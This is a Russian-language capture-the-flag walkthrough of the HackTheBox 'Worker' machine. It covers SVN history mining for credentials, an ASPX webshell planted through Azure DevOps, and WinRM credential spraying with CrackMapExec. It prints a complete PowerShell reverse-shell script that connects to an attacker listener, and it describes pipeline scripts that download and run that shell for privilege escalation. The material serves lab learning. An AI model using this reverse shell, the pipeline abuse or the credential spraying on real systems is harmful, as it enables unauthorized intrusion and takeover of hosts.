HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста

в 14:55, , рубрики: azure, ctf, hack, hackthebox, pentest, pentesting, ralf_rt, red team, redteam, информационная безопасность
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 1

Продолжаю публикацию решений отправленных на дорешивание машин с площадки HackTheBox. Надеюсь, что это поможет хоть кому-то развиваться в области ИБ.

Подключение к лаборатории осуществляется через VPN. Рекомендуется не подключаться с рабочего компьютера или с хоста, где имеются важные для вас данные, так как Вы попадаете в частную сеть с людьми, которые что-то да умеют в области ИБ :)

Организационная информация

Организационная информация

Специально для тех, кто хочет узнавать что-то новое и развиваться в любой из сфер информационной и компьютерной безопасности, я буду писать и рассказывать о следующих категориях:

- PWN;

- криптография (Crypto);

- cетевые технологии (Network);

- реверс (Reverse Engineering);

- стеганография (Stegano);

- поиск и эксплуатация WEB-уязвимостей;

Вдобавок к этому я поделюсь своим опытом в компьютерной криминалистике, анализе малвари и прошивок, атаках на беспроводные сети и локальные вычислительные сети, проведении пентестов и написании эксплоитов.

Чтобы вы могли узнавать о новых статьях, программном обеспечении и другой информации, я создал канал в Telegram и группу для обсуждения любых вопросов в области ИиКБ. Также ваши личные просьбы, вопросы, предложения и рекомендации рассмотрю лично и отвечу всем (ссылка).

Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа.

Recon

Данная машина имеет IP адрес 10.10.10.192, который я добавляю в /etc/hosts.

10.10.10.192	worker.htb

Первым делом сканируем открытые порты. Я это делаю с помощью следующего скрипта, принимающего один аргумент - адрес сканируемого хоста:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr 'n' ',' | sed s/,$//)
nmap -p$ports -A $1
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 2

И нам доступны веб сервер и служба SVN. Веб нам пока ничего предложить не может.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 3

Давайте обратимся к службе svn. Subversion - это свободная централизованная система управления версиями. Давайте полцчим базовую информацию.

svn info svn://worker.htb
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 4

И мы знаем базовую ветку, автора и  что мы можем узнать последние пять изменений.

Entry Point

Посмотрим список файлов в данной ветке.

svn list svn://worker.htb
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 5

 

Имеем директорию и файл. Скачиваем все к себе на хост.

svn export svn://worker.htb/dimension.worker.htb/
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 6
 svn export svn://worker.htb/moved.txt
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 7

И из последнего файла узнаем новый поддомен.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 8

Добавим его в /etc/hosts.

10.10.10.203	devops.worker.htb

Но там нас встречает HTTP аутентификация. Давайте посмотрим последние изменения. На втором шаге мы находим интересный файл, не встречавшийся ранее.

svn checkout -r 1 svn://worker.htb
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 9
 svn checkout -r 2 svn://worker.htb
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 10

Применим изменения, чтобы получить данный файл.

svn up -r 2 deploy.ps1
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 11

И в данном powershell скрипте обнаружим учетные данные.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 12

 С найденными учетными данными получается аутентифицироваться на сайте.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 13

USER

Обратим внимание на репозиторий и то, что он содержит код.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 14

Используем название репозитория как субдомен, занеся его в /etc/hosts.

10.10.10.203	spectral.worker.htb

И нас встречает сайт.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 15

Это вектор RCE. Давайте внесем изменения, добавив на сервере ASPX шелл. Создадим новую ветку, добавим файл, добавим задачу, и сделаем ветку основной.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 16
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 17
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 18
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 19
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 20
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 21
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 22
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 23
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 24
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 25

И после применения всех изменений, обратимся к нашему файлу.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 26

Давайте получим полноценный шелл. Для этого запустим листенер и выполним Powershell бэкконнект.

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.115',4321);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
}; $client.Close()
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 27

И получаем шелл.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 28

Немного осмотревшись, находим директории с конфигурациями.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 29
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 30

И в файле passwd есть много пар логинов и паролей.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 31

А по открытым портам определяем работающую службу WinRM.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 32

 Давайте сделаем списки пользователей и паролей.

cat logpass.txt | tr -d ' ' | cut -f 1 -d '=' > user.txt
cat logpass.txt | tr -d ' ' | cut -f 2 -d '=' > pass.txt

А темеперь выполним подбор пар учетных данных с помощью CrackMapExec.

cme winrm -u user.txt -p pass.txt --no-bruteforce --continue-on-success worker.htb
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 33

И как итог, мы находим учетные данные системного пользователя. Подключаемся и забираем флаг.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 34

ROOT

С этими же учетными данными мы возвращаемся на наш сайт.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 35

Но в этот раз мы можем создать свой проект и выполнить произвольные команды через консоль. Так давайте сделаем это.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 36
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 37
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 38
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 39

В данном файле мы убираем pool и в steps -> script пишем то, что должна выполнить система. К примеру, загрузить и выполнить прежний шелл.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 40
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 41
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 42

И в окне листенера наблюдаем новое подключение, но теперь шелл с высокими привилегиями.

HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 43
HackTheBox. Прохождение Worker. Работаем с SVN. Используем Azure DevOps для захвата хоста - 44

Автор: Ральф Фаилов

Источник

* - обязательные к заполнению поля


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js